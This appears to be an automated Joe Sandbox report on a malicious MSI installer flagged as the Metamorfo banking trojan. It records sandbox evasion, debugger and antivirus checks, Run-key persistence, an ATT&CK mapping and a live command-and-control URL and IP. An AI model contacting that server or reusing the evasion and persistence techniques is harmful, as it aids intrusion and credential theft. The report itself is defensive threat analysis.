Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 489D0F1
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 33AE2F8
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 3459707
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 476B9C8
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 477FD79
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 42ECE32
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4787335
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 3450ADF
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 457AFAE
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 48677AE
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 34CC94D
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 43C61E6
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 48A5DCE
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 34A9BED
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 44090C3
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4CFD0F1
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4BF65A2
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4CE2A6A
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4CC3672
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4BDFD79
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 47F73EA
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4CCD89A
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 49DAFAE
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4BE5720
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4BE7335
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 380E2F8
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 3896F97
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4D05DCE
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 49C2413
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4D38C48
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 38B28EA
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 3909BED
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 407FE3C
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4257335
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 42D07BD
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 3E66D38
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4325852
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 424FD79
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4255D72
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 2F06F97
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 2E7E2F8
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 2F20ADF
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 43A8C48
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 2F79BED
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 4375DCE
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 3DDAC56
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API/Special instruction interceptor: Address: 2F228EA

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory allocated: 86D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory allocated: 8BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory allocated: 8330000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI28F8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2995.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2AE0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI29D5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2A05.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API coverage: 6.1 %
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	API coverage: 6.1 %

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_microsoft.window_fce914e429116371317fd6ae8e3a6ad884573e_e281e47e_5794bd2b-1663-4d82-bb7e-b5838504a6be\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_3ff5516a8ab04d5e2061f4da532180c5d2a1080_d6cb0167_5ef81f74-43b2-4a4c-9f72-dafcda16006e\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior

Source: Wi-fii Corporativo.exe, 00000007.00000002.2700844378.000000000153E000.00000004.00000020.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3685476076.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Code function: 7_2_005116F6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_005116F6

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"

Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 7_2_00511253 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00511253
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 7_2_005116F6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_005116F6
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 7_2_0051188B SetUnhandledExceptionFilter,	7_2_0051188B
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 8_2_00511253 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00511253
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 8_2_005116F6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_005116F6
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 8_2_0051188B SetUnhandledExceptionFilter,	8_2_0051188B

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Code function: 7_2_005119BE cpuid

7_2_005119BE

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Code function: 7_2_005115DE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_005115DE

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Metamorfo

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Metamorfo

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	1 Process Injection	21 Masquerading	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	123 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fiF8mxzUfw.msi	13%	Virustotal		Browse
fiF8mxzUfw.msi	21%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll	34%	ReversingLabs
C:\Windows\Installer\MSI28F8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2995.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI29D5.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2A05.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2AE0.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://15.228.77.178/ytr/serv.php	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://15.228.77.178/ytr/serv.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.indyproject.org/	Wi-fii Corporativo.exe, 00000007.00000002.2701399669.0000000001701000.00000020.00000001.01000000.00000004.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2712198268.000000000683F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3690828895.0000000005D7F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3685884269.0000000000D71000.00000020.00000001.01000000.00000004.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
15.228.77.178	unknown	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592145
Start date and time:	2025-01-15 20:34:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fiF8mxzUfw.msi renamed because original name is a hash value
Original Sample Name:	e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05.msi
Detection:	MAL
Classification:	mal96.troj.evad.winMSI@12/46@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.73.29, 20.189.173.21, 4.245.163.56, 13.107.246.45, 20.190.159.64
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:35:20	API Interceptor	1x Sleep call for process: Wi-fii Corporativo.exe modified
14:36:12	API Interceptor	4x Sleep call for process: WerFault.exe modified
20:35:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
20:35:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
15.228.77.178	SecuriteInfo.com.Variant.Barys.394881.27394.14169.dll	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Variant.Barys.394881.27394.14169.dll	Get hash	malicious	Unknown	Browse
	f_4_T_u_r_4_34536_45645_3345_wo.msi	Get hash	malicious	Unknown	Browse
	n_f_3_e_l_3_t_r_0_n_1_k_4_00545.msi	Get hash	malicious	Unknown	Browse
	n_f_3_f_1_s_k_4_l.msi	Get hash	malicious	Unknown	Browse
	Mandado-Intima#U00e7#U00e3o_Art516mlhg.msi	Get hash	malicious	Unknown	Browse
	z12A____o-Trabalhista.msi	Get hash	malicious	Unknown	Browse
	z1F_4_T_U_r_4_2024mfdfgryry5.msi	Get hash	malicious	Unknown	Browse
	F_4_T_U_R_4___nf____0992344.4354.msi	Get hash	malicious	Unknown	Browse
	rPEDIDOS-10032023-X491kkum.msi	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	Handler.exe	Get hash	malicious	DanaBot, PureLog Stealer, Vidar	Browse	108.139.47.33
	https://fingertip.com/incoming-document	Get hash	malicious	HTMLPhisher	Browse	3.5.169.67
	https://q89x88qh.r.ap-southeast-1.awstrack.me/L0/https:%2F%2Fblackdoor.in%2Fcazxccall%2Frtyucallingzxc%2F/1/010e01946a4fedf7-6a14e9da-4611-4b34-a7c5-f58f00519f0d-000000/p9HvzYrykwYBivTgZCa5Kf2-wBc=194	Get hash	malicious	Unknown	Browse	52.74.136.124
	https://lgray785.wixsite.com/my-site-4	Get hash	malicious	HTMLPhisher	Browse	99.86.4.105
	New order BPD-003777.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	QQE81XYXon.dll	Get hash	malicious	Wannacry	Browse	63.35.17.92
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	txWVWM8Kx4.dll	Get hash	malicious	Wannacry	Browse	52.34.64.1
